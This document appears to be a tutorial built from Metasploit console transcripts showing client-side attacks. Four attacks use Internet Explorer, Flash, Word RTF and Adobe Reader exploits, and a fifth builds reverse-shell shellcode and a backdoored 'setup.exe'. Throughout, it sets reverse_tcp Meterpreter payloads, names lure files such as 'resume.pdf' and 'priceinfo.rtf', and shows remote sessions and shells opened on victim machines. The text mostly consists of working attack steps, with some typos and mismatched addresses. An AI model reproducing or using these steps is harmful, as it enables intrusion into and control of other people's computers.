1. Internet Explorer execCommand use after-free vulnerability

msf > use exploit/windows/browser/ie_execcommand_uaf
msf exploit (ie_execcommand_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload => windows/meterpreter/reverse_tcp
msf exploit (ie_execcommand_uaf) > show options
Module options (exploit/windows/browser/ie_exexccommand_uaf) :
Name 		Current Setting 		Required 	Description
SRVHOST	0.0.0.0			yes		The local host to listen on.
SRVPORT				yes		The local port to listen on.
SSL		false			no		Negotiate SSL for incoming connection.
SSLCert					no		Path to custom SSL Certificate.
SSLVersion	SSL3			no		Specify the version of SSL.
URIPATH				no		The URI to use for this exploit.
Payload options (exploit/windows/browser/ie_exexccommand_uaf) :
Name 		Current Setting 		Required 	Description
EXITFUNC	process			yes		Exit technique : seh, thread, process, none
LHOST					yes		The listen address.		
LPORT		4444			yes		The listen port.
Exploit Target:
Id	  Name
0    	Automatic
msf exploit (ie_execcommand_uaf) > set SRVPORT 80
SRVPORT => 80
msf exploit (ie_execcommand_uaf) > set SRVHOST 192.168.1.101
SRVHOST => 192.168.1.101
msf exploit (ie_execcommand_uaf) >set URIPATH /
URIPATH => /
msf exploit (ie_execcommand_uaf) > exploit
[*] exploit running as background job
[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL : http://192.168.1.101:80/
[*] Server started
msf exploit (ie_execcommand_uaf) >[*] ie_execcommand_uaf) Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_uaf - Redirecting to page.html
[*] 192.168.1.101 ie_execcommand_ uaf - Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_ uaf  loading page.html
[*] 192.168.1.101 ie_execcommand_ uaf  using JRE ADP
[*] 192.168.1.101 ie_execcommand_ uaf - Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_ uaf - Redirecting to page.html
[*] 192.168.1.101 ie_execcommand_ uaf - Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_ uaf - Loading page.html
[*] 192.168.1.101 ie_execcommand_ uaf - Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_ uaf - Redirecting to page.html
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 => 192.168.1.100:63670) at 2012-05-09 18:24:44 
[*] Session ID 1 (192.168.1.101:4444 => 192.168.1.100:63670) processing InitialAutoRun Script migrate -1
 [*] Current server process : ieexplorer.exe (5476)
 [*] Spawning notepad.exe process to migrate to 
[*] Migrating to 4768
[*] Successfully migrated to process
msf exploit (ie_execcommand_uaf) > sessions l
msf exploit (ie_execcommand_uaf) > sessions i 1
[*] Starting interaction with 1
meterpreter > sysinfo
Computer : TRACEWIN
OS : Windows XP (Build 6000, Service Pack 3)
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
=========================================================================

2. Adobe flash player new function invalid pointer use

msf  > use exploit/exploit/wimdows/fileformat/adobe_flashplayer_newfunction
msf  exploit (adobe_flashplayer_newfunction) > set PAYLOAD windows/meterpreter/reverse_tcp 
msf  exploit (adobe_flashplayer_newfunction) > set SRVHOST 192.168.1.101
SRVHOST => 192.168.1.101
msf  exploit (adobe_flashplayer_newfunction) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf  exploit (adobe_flashplayer_newfunction) > exploit
[*] Exploit running as background job.

[*] Started revere handler on 192.168.1.101:4444
[*] Using URL: http://192.168.1.101:8080/filename
[*] Server started.
msf  exploit (adobe_flashplayer_newfunction) >
[*] Sending crafted PDF */SWF to 192.168.1.100:1039
[*] Sending stage (748032 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:1040)
[*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.101:1040) processing InitialAutoRunScript migrate f
[*] Current server process : firefox.exe (3644)
[*] Spawning a notepad.exe host process
[*] Migrating into process ID 3900
[*] New server process: notepad.exe (3900)

msf  exploit (adobe_flashplayer_newfunction) > sessions  -l
Active sessions
Id		Type			Information		Connection
1		meterpreter		ERIC-FD2123B3C	192.168.1.100:1040
msf  exploit (adobe_flashplayer_newfunction) > sessions  -i 1
meterpreter>
============================================================================

3. Microsoft word RTF stack buffer overflow

msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 

msf  exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required   Description
   ----      ---------------  --------   -----------
   FILENAME   msf.rtf          yes       The file name.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh..
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME priceinfo.rtf
FILENAME => priceinfo.rtf

msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.56.101

[*] Creating 'priceinfo.rtf' file ...

[+] priceinfo.rtf stored at /root/.msf4/local/priceinfo.rtf
Sending stage (752128 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:57031) at 2011-11-13 23:16:20 +0530

[*] Session ID 2 (192.168.56.101:4444 -> 192.168.56.1:57031) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: WINWORD.EXE (5820)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 5556
[+] Successfully migrated to process
==============================================================

4. Adobe reader u3d memory corruption

Msf  > use exploit/windows/adobe_reader_u3d
Msf exploit (adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload =>  windows/meterpreter/reverse_tcp
Msf exploit (adobe_reader_u3d) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
Msf exploit (adobe_reader_u3d) > set filename resume.pdf
Filename => resume.pdf
Msf exploit (adobe_reader_u3d) > exploit
[*] Creating resume.pdf file
[+] resume.pdf stored at /root/.msf4/local/resume.pdf

Now we need to create a listener to handle reverse connection when the malicious file is executed on victims vicinity.  Let see how it is done in next few steps.
Msf exploit (adobe_reader_u3d) > use exploit/multi/handler
Msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload =>  windows/meterpreter/reverse_tcp
Msf exploit (handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
Msf exploit (handler) > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler
[*] Sending stage (752128 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.101:1074)

Meterpreter > sysinfo
Computer 	: HP-PC
OS		: Windows XP (Build 2600, Service Pack 2).
Meterpreter > shell
Process 256 created.
Channel 1 created.
Microsoft Windows XP (Version 5.1.2600)
C:\Documents and Settings\John\Desktop>
====================================================================

5. Generating binary and shell code from msfpayload

root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 o
So we have set up the LHOST and LPORT according to our need. The next step will be to generate a C code for our customized shell (the displayed output has been shortened to fit)
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 C

/*
 * windows/shell/reverse_tcp - 290 bytes (stage 1)
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.56.101, LPORT=4441, 
 * ReverseConnectRetries=5, EXITFUNC=process, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
Notice the capital C parameter in the command line. You will notice a complete shellcode in C language which we can use in our own exploit development code. Alternatively, we also have the option to generate codes in Ruby and Perl language. 
Let us proceed to the next step of generating a binary executable for the shellcode which can be used in our client-side attack.
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 X > .local/setup.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.56.101"}

Now that our executable is ready, we will have to set up a listener in our msfconsole to listen for a back connection when the target executes this exe file.
msf > use multi/handler

msf  exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

msf  exploit(handler) > set LHOST 192.168.46.101

msf  exploit(handler) > exploit

[-] Handler failed to bind to 192.168.46.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler


